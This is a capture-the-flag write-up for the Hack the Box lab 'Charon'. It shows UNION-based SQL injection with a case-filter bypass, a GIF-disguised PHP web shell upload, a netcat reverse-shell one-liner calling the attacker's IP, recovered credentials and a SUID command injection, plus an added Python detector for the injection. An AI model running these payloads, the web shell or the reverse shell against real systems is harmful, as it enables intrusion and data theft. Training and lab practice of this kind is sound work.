Hello friends!! Today we are going to solve another CTF challenge, “Charon”, which is available online for those who want to increase their skill in penetration testing and black box testing. Charon is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are available online they have static IPs, and the IP of our target is 10.10.10.31, so let’s begin with nmap port enumeration.
PS C:\Users\jacco> nmap -sC -sV 10.10.10.31
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-10 17:01 W. Europe Standard Time
Nmap scan report for 10.10.10.31
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA)
|   256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA)
|_  256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Frozen Yogurt Shop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.97 seconds
As port 80 is running an HTTP server, we open the target machine’s IP address in our browser.
We run dirbuster against port 80, which reveals a directory named “cmsdata/”.
We open the link and are presented with a login page.
We don’t find anything useful on the login page, so we follow the forgot password link.
We capture the request of that page with Burp Suite and send it to Repeater.
In Repeater we test whether the site is vulnerable to SQL injection. As soon as we add a quote at the end of our email address we get a database error.
To confirm that it is vulnerable to SQL injection we append "-- -" to comment out the rest of the query, and the error disappears.
Now that we know the site is vulnerable to SQL injection, we exploit it. First we find the number of columns using ORDER BY, then we use UNION SELECT to see which column positions are reflected in the output. Since UNION and union are blacklisted, we use UNion for the injection.
email=puck@puckiestyle.nl' UNion SELECT 1,2,3,4 -- -
Injecting plain values into the columns gave us no output, but when we pass a string in column 4 our query runs successfully and its result is shown.
Now that we know how to get past the filtering with a string, we first find the name of the database.
email=puck@puckiestyle.nl' UNion SELECT 1,2,3,concat(database(),"@puckiestyle.nl") -- -
After finding the name of the database we find the table name in the database.
email=puck@puckiestyle.nl' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 1,1 -- -
Enumerating the tables in the database, we find two tables, one called license and another called operators.
' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 2,1 -- -
After getting the names of the tables, we enumerate the columns. The license table doesn’t have any interesting columns but in the “operators” table we find a column called “__username_”.
' UNion select 1,2,3,concat(column_name, "@who.ami") FROM information_schema.columns where table_name="operators" limit 1,1 -- -
After getting the “__username_” column we enumerate further and get a column called “__password_”.
' UNion select 1,2,3,concat(column_name, "@who.ami") FROM information_schema.columns where table_name="operators" limit 2,1 -- -
Now we dump the column name “__username_”.
' UNion select 1,2,3,concat(__username_, "@who.ami") FROM operators limit 1,1 -- -
Now we dump the column name “__password_” for the username = “super_cms_adm”.
' UNion select 1,2,3,concat(__password_, "@who.ami") FROM operators limit 1,1 -- -
When we dump the “__password_” column we get a hash: 0b0689ba94f94533400f4decd87fa260. We use hashkiller.co.uk to crack it.
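The whole enumeration above worked because the CMS blocked only the exact spellings UNION and union. As an added example (not code from the writeup or the CMS), the following compares that case-sensitive filter with a detector that URL-decodes, folds case and collapses whitespace before matching; the request bodies are constructed from the payloads shown above. Detection like this is a compensating control, the real fix is a parameterized query for the email lookup.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample request bodies for the forgot-password form, modelled on
# the payloads in this writeup (not captured traffic).
SAMPLE_BODIES = [
    "email=puck@puckiestyle.nl",
    "email=puck@puckiestyle.nl' UNion SELECT 1,2,3,4 -- -",
    "email=puck%40puckiestyle.nl%27+UNion+select+1%2C2%2C3%2Cconcat%28database%28%29%2C%22%40x%22%29+--+-",
    "email=o'neil@example.com",
]

# The filter the CMS appears to use: two exact-case spellings of one keyword.
BLACKLIST = ("UNION", "union")

UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")
COMMENT_TAIL = re.compile(r"--\s|#|/\*")


def naive_blocked(email: str) -> bool:
    """The weak check: a substring match that 'UNion' walks straight past."""
    return any(word in email for word in BLACKLIST)


def normalize(value: str) -> str:
    """Undo repeated URL-encoding, fold case and collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).lower()


def classify(body: str) -> dict:
    """Report what the naive filter and the normalized detector each decide."""
    email = parse_qs(body, keep_blank_values=True).get("email", [""])[0]
    norm = normalize(email)
    return {
        "email": email,
        "naive_blocked": naive_blocked(email),
        "union_select": bool(UNION_SELECT.search(norm)),
        "comment_tail": bool(COMMENT_TAIL.search(norm)),
    }


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify(body))
```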
Now we have the credentials for the supercms login page: super_cms_adm:tamarro.
After logging in with these credentials we reach a page with an option for uploading an image.
Now we open the link and find an upload page.
We take a look at the source page and find a base64 encoded string.
When we decode it we find the string “testfile1”. It is possible that there is a hidden field with this name.
By adding a new input field to the form named testfile1 and setting the value to writeup.php, it will cause the page to rename the uploaded file to the value specified.
Bypassing the image upload is trivial. Simply put GIF89a; as the first line in the file and save the file with a .gif extension, and it will pass all checks. The remainder of the file can include any PHP script.
puck.php.gif:
GIF89a
<?php echo system($_REQUEST['puck']); ?>
We intercept the upload request and response with Burp, add the new testfile1 field to the POST request and set it to “puck.php”.
The response gives us the location of the file we just uploaded in /images/.
Before running our shell we set up a listener with netcat. As soon as we open the link to our shell,
http://10.10.10.31/images/puck.php?puck=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 443 >/tmp/f
we get our reverse shell.
Enumerating the system, we find an encrypted file and a public key inside the /home/decoder directory.
We download both the files into our system.
meterpreter > download decoder.pub /root/Desktop
meterpreter > download pass.crypt /root/Desktop
Now we decrypt the encrypted file with RsaCtfTool, using the public key.
./RsaCtfTool.py --publickey /root/Desktop/decoder.pub --uncipherfile /root/Desktop/pass.crypt
We use ssh to login using the credentials, decoder:nevermindthebollocks.
ssh decoder@10.10.10.31
After logging in we find a file called user.txt; opening it gives us our first flag.
Next we look for files with the SUID bit set and find a binary called supershell in the /usr/local/bin/ directory.
find / -perm -4000 2>/dev/null
When we run the binary we find that we can run any shell command through it. We use this to read root.txt in the /root/ directory, which gives us our final flag.
supershell "/bin/ls$
> cat /root/root.txt"
Author: Sayantan Bera